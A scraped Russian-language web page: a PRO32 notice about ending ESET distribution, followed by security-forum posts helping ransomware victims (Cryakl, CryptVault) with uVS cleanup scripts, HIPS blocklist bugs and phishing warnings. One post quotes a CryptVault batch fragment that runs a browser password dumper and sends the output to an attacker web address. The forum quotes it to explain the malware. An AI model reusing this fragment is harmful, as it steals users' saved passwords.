Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

Тестируем HIPS
ZloyDi,
добавил в текстовый файл еще одну строку
*себастьян.янке.рф/*
и получил после импорта в блокирующем списке запись (как я и ожидал)
*../*
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
Владимир,
повторный образ не нужен.
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
Владимир Исаков,
по очистке системы выполните скрипт в uVS
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\EXPLORE.EXE

deltmp
delnfr
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
Дмитрий Федоров,
конечно тащит.
[QUOTE]
                                **********************************************
                                         Browser Password Recovery Report
                                **********************************************

____________________________________________________________­___________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com


[/QUOTE]

из тела энкодера запускается утилита для поиска паролей в браузерах.
найденные пароли будут отправлены на сайт злоумышленников.

фрагмент кода:

[QUOTE]if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" хттп://attached-email.com/v.php pf
del /f /q 065ed39e.exe
)[/QUOTE]
Изменено: santy - 01.09.2015 08:42:51
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
1. по образу все чисто. нет шифратора в автозапуске.

2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
Ольга Белоусова,
теперь все правильно.

по очистке системы выполните:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\IEBACK.BAT
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\JSREGISTER.BAT
delall D:\PROGRAM FILES (X86)\TENCENT\QQPCMGR\10.9.16345.222\PLUGINS\FILESMASH\QMSOFTEXT64.DLL
delall %SystemDrive%\PROGRAMDATA\VKSAVER\VKSAVER.EXE
delref HTTP://WWW.HAO123.COM/?TN=91800134_HAO_PG
deltmp
delnfr
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\JHCDLKGJIEHGPNPOLKBNMPFFJODIGBKB\0.2.0_0\JOXI СДЕЛАЙ СКРИНШОТ ЭКРАНА
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\GIGHMMPIOBKLFEPJOCNAMGKKBIGLIDOM\2.36.2_0\ADBLOCK
restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------

по восстановлению документов написал вам в почту.
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.
Изменено: santy - 04.06.2016 17:32:48
Шифровирусы шумной толпою
новый ход мошенников:
в качестве вложения офисный документ, предлагают по сути понизить уровень безопасности в Офисе, с тем чтобы автоматически были запущены макросы, добавленные в документ.

Акт сверки - 27.08.2015 - Подтвердите правильность данных

содержимое документа.

[IMG WIDTH=653 HEIGHT=800]http://s018.radikal.ru/i527/1508/67/56939f259928.jpg[/IMG]
Тестируем HIPS
кстати,  в 6.2 еще и импорт кривой из файлов в блок-листы URL
вместо адреса *янке.рф/*     добавляетcя строка *./*
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
теперь добавьте новый образ автозапуска.